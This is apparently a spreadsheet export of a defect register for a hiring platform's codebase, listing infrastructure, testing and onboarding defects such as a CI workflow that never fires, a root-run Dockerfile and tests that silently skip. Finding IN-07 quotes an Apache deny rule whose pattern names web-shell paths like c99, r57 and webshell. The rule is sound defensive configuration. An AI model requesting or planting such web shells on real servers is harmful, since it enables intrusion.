nothing, so **the workflow has never fired** — and its `working-directory: backend` plus
`pip install -e cortex_memory[dev]` would fail if it did.
Nothing in CI runs `backend/tests/` (1,063 tests), the layout lint, ruff, black, or the
frontend build. `scripts/run_ci_matrix.sh` defines three lanes wired to no trigger.
The workflow appears green in the repository listing because it has no runs.
- [`.github/workflows/cortex-memory.yml:11`](../../../.github/workflows/cortex-memory.yml:11)
- Also recorded as **D-14** in the platform register</t>
  </si>
  <si>
    <t>**Fix first.** Every guardrail in every other register in this set is blocked on this.
---</t>
  </si>
  <si>
    <t>3. T1 — Not production-ready as configured</t>
  </si>
  <si>
    <t>IN-06</t>
  </si>
  <si>
    <t>The Dockerfile runs as root with --reload</t>
  </si>
  <si>
    <t>### IN-06 — The Dockerfile runs as root with `--reload`
**✅ Verified · High**
```dockerfile
CMD ["uvicorn", "src.main:app", "--host", "0.0.0.0", "--port", "8000", "--reload"]
```
No `USER` directive, so the process runs as **root**, and `--reload` starts a file-watching
reloader — extra processes, extra memory, and a code-reload path that should not exist in
production.
That matters more than usual here: `SubprocessRuntime` executes LLM-authored code **as the
API process's own OS user**
([TL-01](TOOL-LAYER-DEFECTS.md#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user)).
In this container, that user is root.
The container path is not the deployed one today — `start_services.sh` runs the processes
on the host — but it is the one anyone containerising will reach for.
- [`backend/Dockerfile`](../../../backend/Dockerfile)</t>
  </si>
  <si>
    <t>IN-07</t>
  </si>
  <si>
    <t>The security config blocks a live static mount</t>
  </si>
  <si>
    <t>### IN-07 — The security config blocks a live static mount
**✅ Verified · High**
`hirebuddha-security.conf` denies:
```apache
&lt;LocationMatch "^/(uploads|shell|cmd|c99|r57|webshell)(/|$)"&gt;
```
`main.py` mounts `/uploads` as a real `StaticFiles` directory holding profile pictures.
So every profile picture 403s in production, and the failure looks like a broken image
rather than a deliberate block.
- [`deploy/apache/hirebuddha-security.conf:168`](../../../deploy/apache/hirebuddha-security.conf:168)
- [`backend/src/main.py:72`](../../../backend/src/main.py:72)
**Fix:** remove `uploads` from the pattern, or move the mount to `/artifact/user-uploads`,
which is where new files already go.
---</t>
  </si>
  <si>
    <t>IN-08</t>
  </si>
  <si>
    <t>No firewall configuration exists in the repository</t>
  </si>
  <si>
    <t>### IN-08 — No firewall configuration exists in the repository
**📄 Doc-reported · High**
Nothing restricts direct access to ports 3000, 8000, 8001, 5433 or 6379 if the VM is
internet-facing. Redis in particular has no password
([SA-05](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-05--the-workers-redis-parser-throws-away-password-tls-and-database-index)
notes the URL parser would discard one anyway).
The entire security model assumes Apache is the only reachable surface, and nothing in the
repository enforces that. It may be handled by cloud security groups — but that is an
assumption, not a configuration.
---</t>
  </si>
  <si>
    <t>IN-09</t>
  </si>
  <si>
    <t>No log rotation</t>
  </si>
  <si>
    <t>### IN-09 — No log rotation
**📄 Doc-reported · High**
`start_services.sh` writes four log files into `logs/` with `nohup` and never rotates them.
The document names this as the most likely cause of a full disk.
`ExecutionDetail`'s never-stopping poll
([FE-19](16-FRONTEND-DEFECTS.md#fe-19--the-execution-poll-never-stops)) makes it worse: one
open browser tab produces roughly 1.3 access-log lines per second, forever.
**Fix:** a `logrotate` config. Ten lines.
---</t>
  </si>
  <si>
    <t>IN-10</t>
  </si>
  <si>
    <t>Three different Python versions</t>
  </si>
  <si>
    <t>### IN-10 — Three different Python versions
**✅ Verified · Medium**
| Where | Version |
|---|---|
| `setup_production_vm.sh` | 3.12 |
| `pyproject.toml` | `^3.11` |
| `backend/Dockerfile` | `python:3.11-slim` |
What is developed against, what is declared, and what a container runs are three different
things.
---</t>
  </si>
  <si>
    <t>IN-11</t>
  </si>
  <si>
    <t>stop_services.sh runs a blanket pkill -f "uvicorn"</t>
  </si>
  <si>
    <t>| **IN-11** | `stop_services.sh` runs a blanket `pkill -f "uvicorn"` | Line 78. It kills **any** uvicorn process on the machine, not just this platform's. Dangerous on a shared or multi-app host | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Traps in the scripts and configs</t>
  </si>
  <si>
    <t>IN-12</t>
  </si>
  <si>
    <t>.env.example ships with port 5432</t>
  </si>
  <si>
    <t>| **IN-12** | `.env.example` ships with port 5432 | Postgres is on host port **5433**. Nothing connects until it is fixed, and the error is a generic connection refusal. Also **D-45** | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>IN-13</t>
  </si>
  <si>
    <t>backend/.env exists in the working tree</t>
  </si>
  <si>
    <t>| **IN-13** | `backend/.env` exists in the working tree | It is `.gitignore`d (confirmed) and currently matches `.env.example` byte-for-byte. Safe today; the risk is someone adding real secrets to a file that already exists locally and assuming it is tracked | ✅ Verified |</t>
  </si>
  <si>
    <t>IN-14</t>
  </si>
  <si>
    <t>npm install requires --legacy-peer-deps</t>
  </si>
  <si>
    <t>| **IN-14** | `npm install` requires `--legacy-peer-deps` | Without it, installation fails on React Three Fiber peer conflicts — for a dependency that powers a decorative background ([FE-17](16-FRONTEND-DEFECTS.md#fe-17--the-webgl-background-never-sleeps)) | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>IN-15</t>
  </si>
  <si>
    <t>streaming.hirebuddha.com reuses the gateway certificate</t>
  </si>
  <si>
    <t>| **IN-15** | `streaming.hirebuddha.com` reuses the gateway certificate | So does `api.hirebuddha.com`. Renewing one certificate affects three hostnames, and a missing SAN entry produces a hostname mismatch. Also **D-43** context | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>IN-16</t>
  </si>
  <si>
    <t>Two competing :80 vhosts for app.hirebuddha.com</t>
  </si>
  <si>
    <t>| **IN-16** | Two competing `*:80` vhosts for `app.hirebuddha.com` | `app.hirebuddha.com.conf` declares one; `app.hirebuddha.com-le-ssl.conf` declares a **second** at line 20 with the HTTPS redirect commented out. Whichever Apache loads first wins | ✅ Verified |</t>
  </si>
  <si>
    <t>IN-17</t>
  </si>
  <si>
    <t>core/ is 20 lines from its lint cap</t>
  </si>
  <si>
    <t>### IN-17 — `core/` is 20 lines from its lint cap
**📄 Doc-reported · Medium**
`lint_ai_layout.py` caps `core/` at 1,500 lines and `agent_loop.py` is ~1,480. The next
substantive change to the control loop fails the lint.
The cap is deliberately a ratchet — the file's own comment says never to raise one. So the
next kernel change must also be a refactor, whether or not that is the right time for one.
- [`backend/scripts/lint_ai_layout.py`](../../../backend/scripts/lint_ai_layout.py)
---</t>
  </si>
  <si>
    <t>5. T3 — Operability</t>
  </si>
  <si>
    <t>IN-18</t>
  </si>
  <si>
    <t>Quality gates exist and run only when someone remembers</t>
  </si>
  <si>
    <t>### IN-18 — Quality gates exist and run only when someone remembers
**📄 Doc-reported · High**
Three real, working gates with no trigger:
| Gate | What it enforces |
|---|---|
| `lint_ai_layout.py` | 271 lines of architecture policy — package caps, forbidden imports, the `tools/` root rule |
| `typecheck_ai.py` | incremental strict typing |
| `run_ci_matrix.sh` | three lanes: fast, full, typing |
All must be invoked by hand. Blocked on
[IN-05](#in-05--the-repository-has-no-functioning-ci).
---</t>
  </si>
  <si>
    <t>IN-19</t>
  </si>
  <si>
    <t>The observability stack does not work out of the box</t>
  </si>
  <si>
    <t>### IN-19 — The observability stack does not work out of the box
**📄 Doc-reported · Medium**
Two problems in `docker-compose.observability.yml` and its config:
- `prometheus.yml` scrapes `host.docker.internal:8000`, which does not resolve on stock
  Linux Docker without an `extra_hosts` entry.
- The Grafana container publishes **port 3000**, colliding with the Vite dev server.
Both are one-line fixes, and both are discovered during an incident — which is the only
time anyone starts this stack.
---</t>
  </si>
  <si>
    <t>IN-20</t>
  </si>
  <si>
    <t>The gateway and the worker have no tracing</t>
  </si>
  <si>
    <t>### IN-20 — The gateway and the worker have no tracing
**✅ Verified · Medium**
`setup_telemetry` is called once, on the last line of `main.py`. The gateway has its own
hand-rolled `/metrics/gateway` JSON endpoint and no OpenTelemetry. The worker has neither.
The worker is where every agent execution runs. So the process doing the expensive work is
the one with no distributed tracing and no metrics endpoint.
- [`common/telemetry.py`](../../../backend/src/common/telemetry.py)
---</t>
  </si>
  <si>
    <t>IN-21</t>
  </si>
  <si>
    <t>There is no rollback procedure beyond git checkout</t>
  </si>
  <si>
    <t>### IN-21 — There is no rollback procedure beyond `git checkout`
**📄 Doc-reported · Medium**
The rollback runbook is: check out the previous commit and restart. There are no tagged
releases, no build artefacts, and — because the frontend is served by a dev server
([SA-I1](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i1--serve-the-frontend-as-a-build-not-a-dev-server))
— no way to roll back the frontend independently of the backend.
Database migrations have `downgrade` functions, but nothing in the runbook says when to run
them, and several migrations are defensively idempotent in ways that make a downgrade
uncertain ([DM-20](03-DATA-MODEL-DEFECTS.md#dm-20--some-migrations-are-defensively-idempotent-because-environments-drifted)).
---</t>
  </si>
  <si>
    <t>TS-01</t>
  </si>
  <si>
    <t>The only CI workflow has never fired</t>
  </si>
  <si>
    <t>19. Testing &amp; Quality Gates</t>
  </si>
  <si>
    <t>### TS-01 — The only CI workflow has never fired
**✅ Verified · Critical**
One GitHub Actions workflow exists, triggering on:
```yaml
paths: ["backend/cortex_memory/**"]
```
That directory is now `backend/cortex_memory_moved_to_pypi_repo/`. The filter matches
nothing, so the workflow **has never run** — and its `working-directory: backend` plus
`pip install -e cortex_memory[dev]` would fail if it did.
The workflow looks present and green in the repository listing precisely because it has no
runs.
- [`.github/workflows/cortex-memory.yml:11`](../../../.github/workflows/cortex-memory.yml:11)
- Also recorded as **D-14** in the platform register
---</t>
  </si>
  <si>
    <t>19-TESTING-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Nothing enforces any of it</t>
  </si>
  <si>
    <t>TS-02</t>
  </si>
  <si>
    <t>1,063 backend tests run only when someone remembers</t>
  </si>
  <si>
    <t>### TS-02 — 1,063 backend tests run only when someone remembers
**✅ Verified · Critical**
| Tier | Files | Test functions |
|---|---|---|
| `unit/` | 89 | 745 |
| `e2e/` | 17 | 183 |
| `ai/` | 9 | 72 |
| `integration/` | 9 | 44 |
| `eval/` | 1 | 14 |
| `chaos/` | 2 | 5 |
| `parity/` | 2 | 2 |
| `regression/` | 1 | 1 |
That is a genuinely good suite — 745 pure unit tests is a lot, and the parity and
regression functions each iterate internally over many cases.
**None of it runs on push or pull request.** `scripts/run_ci_matrix.sh` defines three lanes
— fast, full, typing — wired to no trigger. The instruction in the docs is to run
`scripts/run_ci_matrix.sh fast` manually before pushing.</t>
  </si>
  <si>
    <t>TS-03</t>
  </si>
  <si>
    <t>Three working quality gates have no trigger either</t>
  </si>
  <si>
    <t>### TS-03 — Three working quality gates have no trigger either
**📄 Doc-reported · High**
| Gate | What it enforces |
|---|---|
| [`lint_ai_layout.py`](../../../backend/scripts/lint_ai_layout.py) | 271 lines of architecture policy — package line caps, forbidden imports, the comment-narration and canary-label bans, the `tools/` root rule |
| [`typecheck_ai.py`](../../../backend/scripts/typecheck_ai.py) | incremental strict typing |
| ruff / black | formatting and lint |
All three are real, working and invoked by hand only. The layout lint in particular encodes
decisions that are expensive to unwind once violated — package caps are described in the
file as a ratchet.
---</t>
  </si>
  <si>
    <t>TS-04</t>
  </si>
  <si>
    <t>npm run lint cannot run, and there is no frontend test runner</t>
  </si>
  <si>
    <t>### TS-04 — `npm run lint` cannot run, and there is no frontend test runner
**✅ Verified · High**
`package.json` declares a `lint` script and installs `eslint`, `@typescript-eslint/*`,
`eslint-plugin-react-hooks` and `eslint-plugin-react-refresh`. There is **no ESLint config
file** anywhere, so the command fails immediately.
There is no `test` script and neither `vitest` nor `jest` is installed.
So the frontend has **zero** automated checking of any kind, beyond `tsc` during a build
that production does not run.
- [`frontend/package.json`](../../../frontend/package.json)
- Also **D-39** and **D-40**; see
  [FE-02](16-FRONTEND-DEFECTS.md#fe-02--npm-run-lint-cannot-run) and
  [FE-03](16-FRONTEND-DEFECTS.md#fe-03--there-is-no-test-runner)
---</t>
  </si>
  <si>
    <t>TS-05</t>
  </si>
  <si>
    <t>Three test tiers skip instead of failing</t>
  </si>
  <si>
    <t>### TS-05 — Three test tiers skip instead of failing
**✅ Verified · High**
`integration/`, `e2e/` and `parity/` all call `pytest.skip()` from their fixtures when the
database is unreachable:
```python
pytest.skip("DATABASE_URL not set; integration suite skipped")
pytest.skip(f"Postgres unreachable; integration suite skipped ({exc})")
pytest.skip("DATABASE_URL not set — parity gate needs a Postgres.")
pytest.skip("Could not create app_admin user – check if DB is reachable")
```
So a developer — or a future CI job — with no Postgres gets a **green run** that executed
745 unit tests and skipped 229 of the tests that touch real infrastructure. The exit code
is 0.
The parity suite is the sharpest case: it is described as the legacy-deletion gate, and it
silently does not run.</t>
  </si>
  <si>
    <t>- [`backend/tests/integration/conftest.py:56`](../../../backend/tests/integration/conftest.py:56), [`:65`](../../../backend/tests/integration/conftest.py:65)
- [`backend/tests/parity/conftest.py:88`](../../../backend/tests/parity/conftest.py:88), [`:96`](../../../backend/tests/parity/conftest.py:96)
- [`backend/tests/e2e/conftest.py:74`](../../../backend/tests/e2e/conftest.py:74)
**Fix:** keep skipping locally, but fail in CI. An environment variable —
`REQUIRE_DB=1` — that turns the skip into a failure is enough.
---</t>
  </si>
  <si>
    <t>3. T1 — A green run can be an empty run</t>
  </si>
  <si>
    <t>TS-06</t>
  </si>
  <si>
    <t>An unmocked LLM call returns a STUB: string, not an error</t>
  </si>
  <si>
    <t>### TS-06 — An unmocked LLM call returns a `STUB:` string, not an error
**📄 Doc-reported · High**
When a test path reaches the LLM without a mock configured, the harness returns a response
beginning `STUB:` rather than raising.
So a test can exercise a code path, assert on an output that was never generated, and pass.
The advice in the docs is to grep the output for `STUB:` when results look wrong — which
means the failure mode is a **passing test that proves nothing**.
- [`backend/tests/harness/mock_llm.py`](../../../backend/tests/harness/mock_llm.py)
**Fix:** raise by default and require an explicit opt-in for stub mode.
---</t>
  </si>
  <si>
    <t>TS-07</t>
  </si>
  <si>
    <t>e2e/ does not roll back</t>
  </si>
  <si>
    <t>### TS-07 — `e2e/` does not roll back
**📄 Doc-reported · Medium**
`integration/` wraps each test in a SAVEPOINT and rolls back. `e2e/` does not — it leaves
users, companies and runs in the database on every run.
Two consequences: the database accumulates test data indefinitely, and tests can pass or
fail depending on residue from earlier runs. The 183 e2e tests are also the slowest tier, so
this is the one most likely to be run repeatedly against one database.
---</t>
  </si>
  <si>
    <t>TS-08</t>
  </si>
  <si>
    <t>The frontend tests cannot run at all</t>
  </si>
  <si>
    <t>### TS-08 — The frontend tests cannot run at all
**✅ Verified · High**
Two `.test.ts` files exist and both import from `vitest`, which is not installed.
Worse, `tsconfig.json` **excludes** `*.test.ts`, so they are not type-checked either. One of
them is already broken: `useExecutionEvents.test.ts`'s local `_INITIAL` object is missing
the `spans` field added later to `ExecutionEventState`.
So the frontend has two test files that cannot execute and would not compile.
- [`frontend/src/hooks/useExecutionEvents.test.ts`](../../../frontend/src/hooks/useExecutionEvents.test.ts)
- [`frontend/src/components/agent/cortex-helpers.test.ts`](../../../frontend/src/components/agent/cortex-helpers.test.ts)
---</t>
  </si>
  <si>
    <t>TS-09</t>
  </si>
  <si>
    <t>The root tests/ directory</t>
  </si>
  <si>
    <t>| **TS-09** | The root `tests/` directory | Four directories containing nothing but `__init__.py` — `fixtures/`, `harness/`, `parity/`, `regression/`. Mirrors four `backend/tests/` names and holds nothing. A leftover from a package-layout experiment | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Dead scaffolding</t>
  </si>
  <si>
    <t>TS-10</t>
  </si>
  <si>
    <t>The kpi marker and its CI step</t>
  </si>
  <si>
    <t>| **TS-10** | The `kpi` marker and its CI step | Registered in `pytest.ini`, used **0 times**, and `backend/tests/kpi/` does not exist. Both the marker and the CI lane are placeholders | ✅ Verified |</t>
  </si>
  <si>
    <t>TS-11</t>
  </si>
  <si>
    <t>The needs_redis marker</t>
  </si>
  <si>
    <t>| **TS-11** | The `needs_redis` marker | Registered, used **0 times** | ✅ Verified |</t>
  </si>
  <si>
    <t>TS-12</t>
  </si>
  <si>
    <t>backend/tests/phase9/</t>
  </si>
  <si>
    <t>| **TS-12** | `backend/tests/phase9/` | Two legacy scripts, **no pytest tests**. Also violates the canary-label ban that `lint_ai_layout.py` enforces on `src/ai/` | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>TS-13</t>
  </si>
  <si>
    <t>One of the two MockLLMRouter classes</t>
  </si>
  <si>
    <t>| **TS-13** | One of the two `MockLLMRouter` classes | Defined in both [`tests/harness/mock_llm.py`](../../../backend/tests/harness/mock_llm.py) and [`tests/fixtures/llm_fixture.py`](../../../backend/tests/fixtures/llm_fixture.py). Which one a test gets depends on its conftest | ✅ Verified |</t>
  </si>
  <si>
    <t>TS-14</t>
  </si>
  <si>
    <t>@pytest.mark.integration is used and not registered</t>
  </si>
  <si>
    <t>### TS-14 — `@pytest.mark.integration` is used and not registered
**✅ Verified · Medium**
`pytest.ini` registers `parity`, `regression`, `chaos`, `kpi`, `slow`, `needs_db`,
`needs_redis` and `needs_llm`. It does **not** register `integration` — which is used three
times.
An unregistered marker emits a warning and, under `--strict-markers`, fails the run. So the
suite cannot adopt strict markers without a fix, and a typo'd marker today is silently
ignored — a test filtered by it simply never runs.
- [`backend/pytest.ini`](../../../backend/pytest.ini)
---</t>
  </si>
  <si>
    <t>5. T3 — Traps and drift</t>
  </si>
  <si>
    <t>TS-15</t>
  </si>
  <si>
    <t>Marker usage is far below marker registration</t>
  </si>
  <si>
    <t>### TS-15 — Marker usage is far below marker registration
**✅ Verified · Low**
| Marker | Registered | Used |
|---|---|---|
| `needs_db` | yes | 8 |
| `chaos` | yes | 3 |
| `slow` | yes | 2 |
| `parity` | yes | 1 |
| `regression` | yes | 1 |
| `needs_llm` | yes | 1 |
| `kpi` | yes | **0** |
| `needs_redis` | yes | **0** |
| `integration` | **no** | 3 |
The CI lanes select by marker (`-m "not (parity or regression or chaos)"`). With 8
`needs_db` markers across 229 infrastructure-dependent tests, marker-based selection cannot
actually separate the fast tier from the slow one — the real separation is by directory.
---</t>
  </si>
  <si>
    <t>TS-16</t>
  </si>
  <si>
    <t>The parity suite leaves tenants behind</t>
  </si>
  <si>
    <t>### TS-16 — The parity suite leaves tenants behind
**📄 Doc-reported · Medium**
Parity runs create `parity-*` tenants and do not clean them up. The advice is to use a
disposable Postgres.
Combined with [TS-07](#ts-07--e2e-does-not-roll-back), two of the eight tiers pollute the
database they run against, and the suite has no teardown story.
---</t>
  </si>
  <si>
    <t>TS-17</t>
  </si>
  <si>
    <t>Fixture loading is coupled to the entity schema</t>
  </si>
  <si>
    <t>### TS-17 — Fixture loading is coupled to the entity schema
**📄 Doc-reported · Medium**
Loading an entity fixture validates it against `HierarchicalEntityCreate`. Any schema change
breaks fixture loading across every tier that uses fixtures.
That coupling is deliberate and useful — it catches drift. The cost is that one schema
change can turn a large part of the suite red at once, which is a strong incentive to
*avoid* schema changes rather than to fix fixtures.
---</t>
  </si>
  <si>
    <t>TS-18</t>
  </si>
  <si>
    <t>Documentation and reality have drifted in three places</t>
  </si>
  <si>
    <t>### TS-18 — Documentation and reality have drifted in three places
**📄 Doc-reported · Low**
| Claim | Reality |
|---|---|
| `ONBOARDING.md` says "~420 passed" | `tests/unit/` alone has 745 test functions |
| The eval README says the cases are `*.yml` | they are `*.yaml` |
| 503 tests still carry `@pytest.mark.asyncio` | `asyncio_mode = auto` makes it unnecessary |
Individually trivial. Together they are the reason a newcomer cannot tell whether a run
looks right.
---</t>
  </si>
  <si>
    <t>TS-19</t>
  </si>
  <si>
    <t>The engine fixture is function-scoped, deliberately</t>
  </si>
  <si>
    <t>### TS-19 — The engine fixture is function-scoped, deliberately
**📄 Doc-reported · Low · accept**
A performance cost accepted for isolation. Recorded so it is not "optimised" into a
session-scoped fixture — that change reintroduces the
`attached to a different loop` failures the session-scoped event loops exist to prevent.
---</t>
  </si>
  <si>
    <t>ON-01</t>
  </si>
  <si>
    <t>The setup sequence omits two required steps</t>
  </si>
  <si>
    <t>20. Developer Onboarding &amp; Glossary</t>
  </si>
  <si>
    <t>### ON-01 — The setup sequence omits two required steps
**✅ Verified · High**
The day-one flow is: install → `.env` → docker → `alembic upgrade head` →
`seed_admin_user.py` → npm → `start_services.sh`.
Two steps are missing, and both are documented elsewhere in the same set
([03 §15](../03-data-model.md)):
| Missing step | Consequence |
|---|---|
| `python -m migrations.merge_phone_tables` | `phone_numbers` is created by **no** Alembic migration. Without it the whole phone inventory is absent — see [DM-02](03-DATA-MODEL-DEFECTS.md#dm-02--phone_numbers-is-created-by-a-script-not-a-migration) |
| `python -m scripts.seed_sandbox_sku` | Without the `sandbox-runtime` SKU, sandbox metering logs a warning and records nothing |
A developer following document 20 exactly gets a database missing a table the ORM
references, and discovers it only when a phone-numbers page 500s.
- [`backend/migrations/merge_phone_tables.py`](../../../backend/migrations/merge_phone_tables.py)</t>
  </si>
  <si>
    <t>- [`backend/scripts/seed_sandbox_sku.py`](../../../backend/scripts/seed_sandbox_sku.py)
---</t>
  </si>
  <si>
    <t>20-ONBOARDING-AND-GLOSSARY-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — The documented setup does not work</t>
  </si>
  <si>
    <t>ON-02</t>
  </si>
  <si>
    <t>Step 4 is "edit a file to fix a shipped default"</t>
  </si>
  <si>
    <t>### ON-02 — Step 4 is "edit a file to fix a shipped default"
**✅ Verified · High**
The setup diagram has a highlighted step: **"4. EDIT .env — change 5432 to 5433"**, and the
prose calls it "the single most common day-one failure".
Documenting a workaround for a wrong default, and highlighting it in the diagram, is the
wrong fix. `.env.example` should ship with 5433, which is what `docker-compose.yml` maps.
The same wrong default also sits in `UnifiedGatewaySettings.DATABASE_URL`
([SA-03](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-03--the-gateways-default-database-port-is-wrong)).
- [`backend/.env.example`](../../../backend/.env.example)
- Also **D-45** in the platform register
---</t>
  </si>
  <si>
    <t>ON-03</t>
  </si>
  <si>
    <t>The verification step passes on a system that cannot run an agent</t>
  </si>
  <si>
    <t>### ON-03 — The verification step passes on a system that cannot run an agent
**✅ Verified · Medium**
The documented verification is: curl the two health endpoints, import `WorkerSettings`, run
the unit tests, open the browser.
All four pass on a system with **no LLM integration configured** — at which point every
agent run fails with "No model configured"
([LP-10](10-LLM-PROVIDERS-DEFECTS.md#lp-10--nothing-is-seeded-so-a-fresh-install-cannot-run-an-agent)).
`model_task_defaults` starts empty and nothing seeds it.
The troubleshooting table does mention "Agent runs but does nothing → No LLM credentials",
so the knowledge exists — it just is not part of the verification.
---</t>
  </si>
  <si>
    <t>ON-04</t>
  </si>
  <si>
    <t>The five-process table lists a process nothing starts</t>
  </si>
  <si>
    <t>### ON-04 — The five-process table lists a process nothing starts
**✅ Verified · Medium**
§1 states: *"Five processes on one VM — Backend 8000, Gateway 8001, **Voice 8002**, Arq
worker, Vite 3000."*
`start_services.sh` starts four. Port 8002 is retired, unstarted, and described as such by
the gateway's own code.
The same document contradicts itself at §9 item 9, which correctly says the voice service
is not started. A newcomer reading top to bottom learns the wrong thing first.
- [`start_services.sh`](../../../start_services.sh)
- Same as [SA-01](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-01--streaming_host-defaults-to-a-service-that-does-not-run) and **W-1**
---</t>
  </si>
  <si>
    <t>ON-05</t>
  </si>
  <si>
    <t>Section 3.3 describes a memory block that is never injected</t>
  </si>
  <si>
    <t>### ON-05 — Section 3.3 describes a memory block that is never injected
**✅ Verified · High**
The mental-model section says:
&gt; Four typed memory domains (Knowledge, Episodic, Experience, Intelligence) feed a
&gt; `__memory__` block that gets injected into the prompt.
`assemble_memory` — the function that builds that block — has **zero production callers**.
`AgentLoop` constructs its `Perceiver` with `memory_assembler=None`, and `step_executor`
actively **strips** `__memory__` from child contexts.
So one of the four load-bearing concepts a new developer is told to learn describes
behaviour the platform does not have. Anyone debugging "why doesn't the agent remember?"
will start from a false premise.
- [`ai/memory/assembler.py:19`](../../../backend/src/ai/memory/assembler.py:19) — no callers
- [`ai/core/agent_loop.py:766`](../../../backend/src/ai/core/agent_loop.py:766) — `memory_assembler=None`
- Full write-up:
  [MC-01](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-01--cortex-is-write-only-on-the-live-path)</t>
  </si>
  <si>
    <t>**Fix:** either wire it (which is a small change and the right one), or change §3.3 to say
memory is currently written and not read.
---</t>
  </si>
  <si>
    <t>3. T1 — The onboarding teaches the wrong model</t>
  </si>
  <si>
    <t>ON-06</t>
  </si>
  <si>
    <t>The first-change exercise targets a deprecated tool through an unwired gate</t>
  </si>
  <si>
    <t>### ON-06 — The first-change exercise targets a deprecated tool through an unwired gate
**✅ Verified · High**
The guided exercise is: enable the `EXPERIMENTAL` `video_generation` tool for your dev
tenant by inserting a `tools.experimental.video_generation` feature-flag row, then assert
that `ToolRegistry.get_visible_tools_for_company` surfaces it.
Three problems:
1. `video_generation` is **`ToolStatus.DEPRECATED`**, not `EXPERIMENTAL`, and is a
   deletion candidate ([PO-17](01-PRODUCT-OVERVIEW-DEFECTS.md#4-t2--dead-code-and-dead-surfaces)).
2. `get_visible_tools_for_company` has **no production callers** — only this test and a
   comment ([TL-13](TOOL-LAYER-DEFECTS.md#tl-13--the-tool-status-gate-is-not-wired-into-execution)).
3. So the exercise's assertion passes while the tool is *already executable* by any entity
   that names it, flag or no flag.
The first thing a new developer is taught is therefore a control that does not control
anything — and they are taught it as though it works.
- [`backend/src/ai/ONBOARDING.md:65`](../../../backend/src/ai/ONBOARDING.md:65)–75
- [`ai/tools/base.py:192`](../../../backend/src/ai/tools/base.py:192) — the unwired gate</t>
  </si>
  <si>
    <t>ON-07</t>
  </si>
  <si>
    <t>"Most gates fail open" is stated and then not acted on</t>
  </si>
  <si>
    <t>### ON-07 — "Most gates fail open" is stated and then not acted on
**✅ Verified · Medium · partially good**
§9 item 2 is admirably honest: *"Most gates fail open… A broken gate looks exactly like a
passing gate. Read logs, not just outcomes."*
That is correct and valuable. The gap is that it is presented as a **quirk to work around**
rather than a defect to fix. A newcomer learns to distrust the controls rather than to
report them.
See [GH-21](15-GOVERNANCE-AND-HITL-DEFECTS.md#gh-21--almost-every-gate-in-the-platform-fails-open)
for the full list and
[GH-I2](15-GOVERNANCE-AND-HITL-DEFECTS.md#gh-i2--emit-a-metric-whenever-a-gate-fails-to-evaluate)
for the fix.
---</t>
  </si>
  <si>
    <t>ON-08</t>
  </si>
  <si>
    <t>The quality gates a newcomer is told to run are not enforced anywhere</t>
  </si>
  <si>
    <t>### ON-08 — The quality gates a newcomer is told to run are not enforced anywhere
**✅ Verified · High**
§8.1 presents the layout lint's rules as things that "will fail your build". §5's exercise
diagram shows a `CI` participant returning green.
There is no CI. The one workflow filters on a directory that no longer exists
([TS-01](19-TESTING-DEFECTS.md#ts-01--the-only-ci-workflow-has-never-fired)). §9 item 7 and
a note in §5 both say so.
So the document tells the newcomer both that the build enforces these rules and that nothing
runs them. The first framing is the one in the diagram.
---</t>
  </si>
  <si>
    <t>ON-09</t>
  </si>
  <si>
    <t>core/ has 20 lines of headroom and the doc says so twice</t>
  </si>
  <si>
    <t>### ON-09 — `core/` has 20 lines of headroom and the doc says so twice
**✅ Verified · Medium**
`agent_loop.py` is ~1,480 lines against a 1,500-line cap, flagged in both §8.1 and the
gotchas.
Telling a new developer "your first change to the control loop must also be a refactor" is
accurate and is a poor first experience. The right response is to extract before the next
contributor arrives, not to document the wall.
- [`backend/scripts/lint_ai_layout.py`](../../../backend/scripts/lint_ai_layout.py)
- Same as [IN-17](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md#in-17--core-is-20-lines-from-its-lint-cap)
---</t>
  </si>
  <si>
    <t>ON-10</t>
  </si>
  <si>
    <t>src/ai/models.py is a deprecated shim still in the tree</t>
  </si>
  <si>
    <t>| **ON-10** | `src/ai/models.py` is a deprecated shim still in the tree | Re-exports every ORM class from `src.ai.orm.*` so old imports keep working. §7.3 lists it as a trap. It has been a trap for long enough — delete it and fix the importers | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Stale references</t>
  </si>
  <si>
    <t>ON-11</t>
  </si>
  <si>
    <t>| **ON-11** | The root `tests/` directory | Four `__init__.py` files and nothing else. §7.3 lists it as a trap. Deleting it removes the trap entirely. Also [TS-09](19-TESTING-DEFECTS.md#4-t2--dead-scaffolding) | ✅ Verified |</t>
  </si>
  <si>
    <t>ON-12</t>
  </si>
  <si>
    <t>backend/cortex_memory_moved_to_pypi_repo/</t>
  </si>
  <si>
    <t>| **ON-12** | `backend/cortex_memory_moved_to_pypi_repo/` | The directory name is itself the documentation. §7.3 and §9 item 5 both explain it. Either publish the package or move it back — see [MC-I10](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-i10--decide-where-cortex_memory-lives) | ✅ Verified |</t>
  </si>
  <si>
    <t>ON-13</t>
  </si>
  <si>
    <t>| **ON-13** | `core/README.md` documents two files that do not exist | `execution_engine.py` and `recursive_engine.py`. §7.4 recommends it as worth reading. Also [AK-14](05-AGENT-KERNEL-DEFECTS.md#4-t2--delete-or-fix-the-name) | ✅ Verified |</t>
  </si>
  <si>
    <t>ON-14</t>
  </si>
  <si>
    <t>docs/phase9/ through docs/phase12/</t>
  </si>
  <si>
    <t>| **ON-14** | `docs/phase9/` through `docs/phase12/` | Historical plans kept alongside current documentation. §7.4 warns "the code is truth", which is the right instruction and does not stop a newcomer opening them first. Move them under `docs/history/` | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>ON-15</t>
  </si>
  <si>
    <t>The glossary lists two deprecated reasoning modes without saying so</t>
  </si>
  <si>
    <t>### ON-15 — The glossary lists two deprecated reasoning modes without saying so
**✅ Verified · Low**
